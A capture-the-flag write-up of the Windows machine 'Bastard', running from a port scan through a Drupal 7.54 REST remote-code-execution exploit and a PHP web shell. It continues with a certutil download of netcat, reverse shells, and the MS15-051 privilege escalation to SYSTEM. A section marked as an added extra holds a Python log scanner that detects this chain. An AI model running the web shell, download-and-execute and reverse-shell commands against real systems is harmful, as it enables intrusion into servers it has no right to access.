Name Bastard
OS Windows
RELEASE DATE 18 Mar 2017

Port Scan

# Nmap 7.92 scan initiated Fri Apr 29 19:20:38 2022 as: nmap -p- -oN scriptScan.nmap -v -sVC
Nmap scan report for
Host is up (0.078s latency).
Not shown: 65532 filtered tcp ports (no-response)
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-title: Welcome to |
|_http-generator: Drupal 7 (
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Browsing to the web page, it looks like a Drupal site.


From the nmap output there is a /robots.txt. Looking at that file, there is a disallow entry for /CHANGELOG.txt, which probably contains version information for the Drupal site.

The changelog does indeed show the version to be “Drupal 7.54, 2017-02-01”.


Googling “Drupal 7.54” exploit brings me to this site, which explains that there is an RCE.

It tells us to copy over the exploit with searchsploit -m php/webapps/41564.php and make a few changes to the first part of the exploit:


define('QID', 'anything');
define('TYPE_PHP', 'application/vnd.php.serialized');
define('TYPE_JSON', 'application/json');
define('CONTROLLER', 'user');
define('ACTION', 'login');

$url = '';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$file = [
    'filename' => 'test.php',
    'data' => '<?php echo"Zonifer Rocks"; ?>'
];

Before we run the exploit we need to install php-curl with sudo apt-get install php-curl. Once that is installed we can run the exploit with php 41564.php, and browsing to the uploaded file shows that the exploit works!


We can take this a step further and run commands on the server by making a few more changes to the exploit:

$url = '';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$phpCode = <<<'EOD'
<?php
 if (isset($_REQUEST['fupload'])) {
   file_put_contents($_REQUEST['fupload'], file_get_contents("" . $_REQUEST['fupload']));
 }
 if (isset($_REQUEST['fexec'])) {
   echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
 }
?>
EOD;

$file = [
    'filename' => 'cmd.php',
    'data' => $phpCode
];

Now requesting the uploaded cmd.php gives us code execution!


We can now use a Windows netcat executable to get a reverse shell. First, find the binary with locate; any of the results should work. I used this one:

└─$ locate nc.exe

Copy it to the working directory with cp /home/kali/tools/netcat-1.11/nc.exe and start a Python web server to host it with python3 -m http.server 80. Next, use certutil.exe through the simple web shell to download the file from Kali onto the host. We can confirm that it downloaded by looking at the Python web server:

└─$ python3 -m http.server 80
Serving HTTP on port 80 ( ...
 - - [29/Apr/2022 23:29:21] "GET /nc.exe HTTP/1.1" 200 -
 - - [29/Apr/2022 23:29:22] "GET /nc.exe HTTP/1.1" 200 -

Next, start a listener for the shell with nc -lvnp 9001 and execute this in the browser to get a connection back. Looking back at the listener, we now have a shell as iusr:

└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [] from (UNKNOWN) [] 64544
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

nt authority\iusr
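A defender-side counterpart to the web shell and netcat download steps above, added here and not part of the original writeup: it scans a constructed IIS W3C log excerpt for the traces this chain leaves on the server (fetching the version-disclosing files listed in robots.txt, the POST to the Services REST endpoint the exploit uses, and the fexec/fupload parameters of the dropped web shell), grouping findings by client address. The log lines, addresses, timestamps and field order are assumptions.

```python
from urllib.parse import unquote_plus
# Constructed IIS W3C log excerpt modelled on this writeup's steps; addresses,
# timestamps and field order are made up, not taken from the box.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2022-04-29 19:22:01 10.0.0.5 GET /robots.txt - 80 - 10.0.0.99 Mozilla/5.0 200
2022-04-29 19:22:09 10.0.0.5 GET /CHANGELOG.txt - 80 - 10.0.0.99 Mozilla/5.0 200
2022-04-29 19:30:44 10.0.0.5 POST /rest/user/login - 80 - 10.0.0.99 PHP/7.4 200
2022-04-29 19:31:02 10.0.0.5 GET /cmd.php fexec=whoami 80 - 10.0.0.99 Mozilla/5.0 200
2022-04-29 23:29:21 10.0.0.5 GET /cmd.php fexec=certutil.exe+-urlcache+-f+http%3A%2F%2F10.0.0.99%2Fnc.exe+nc.exe 80 - 10.0.0.99 Mozilla/5.0 200
2022-04-29 23:35:10 10.0.0.5 GET /index.php - 80 - 10.0.0.42 Mozilla/5.0 200
"""
# Drupal files that disclose its version; all sit under Disallow in the robots.txt above.
VERSION_FILES = {"/changelog.txt", "/install.txt", "/install.mysql.txt",
                 "/install.pgsql.txt", "/install.sqlite.txt"}
SHELL_PARAMS = {"fexec", "fupload"}   # parameters of the web shell from the writeup
TOOL_WORDS = ("certutil", "nc.exe", "powershell", "cmd.exe")  # checked after URL-decoding

def parse_iis(text):
    """Yield one dict per entry, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def classify(entry):
    """Return (severity, reason) for one entry, or None if it looks benign."""
    stem = entry["cs-uri-stem"].lower()
    query = unquote_plus(entry["cs-uri-query"])
    params = {kv.split("=", 1)[0].lower() for kv in query.split("&")} if query != "-" else set()
    if params & SHELL_PARAMS:
        if any(w in query.lower() for w in TOOL_WORDS):
            return ("critical", f"web shell used to fetch or run tooling: {query}")
        return ("critical", f"web shell parameter in query: {query}")
    if entry["cs-method"] == "POST" and stem.startswith("/rest/"):
        return ("high", f"POST to Services REST endpoint {stem}")
    if stem in VERSION_FILES:
        return ("low", f"version-disclosing file fetched: {stem}")
    return None

def scan_log(text):
    # Run classify() over the whole log and group findings per client address.
    findings = {}
    for entry in parse_iis(text):
        hit = classify(entry)
        if hit:
            findings.setdefault(entry["c-ip"], []).append(hit)
    return findings
```

Calling scan_log(SAMPLE_LOG) returns the four escalating findings for 10.0.0.99 and nothing for the ordinary visitor; on a real server the same rules would run over the IIS log directory rather than the embedded sample.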


Let’s see what kind of Windows machine this is by running systeminfo. From the output below it is Windows Server 2008 R2 on a 64-bit architecture.

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3582622-84461
Original Install Date:     18/3/2017, 7:04:46 
System Boot Time:          1/5/2022, 1:30:52 
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC

There is a useful GitHub repo called SecWiki that has a directory of Windows kernel exploits. Looking through the page, MS15-051 looks like it might work on this machine. I will download the zip file and extract ms15-051x64.exe to my working directory.

Next, copy it over to the machine with certutil.exe -urlcache -f exploit.exe (with the Python web server still running).

Now we can test whether it works:

[#] ms15-051 fixed by zcgonvh
[!] process with pid: 2492 created.
nt authority\system

We can now execute code as nt authority\system! We can use netcat again to get a reverse shell, this time as SYSTEM. Make sure to set up a netcat listener to catch the shell with nc -lvnp 9002, then execute exploit.exe "nc.exe 9002 -e cmd.exe".

Once it finishes we have a shell as SYSTEM!

nt authority\system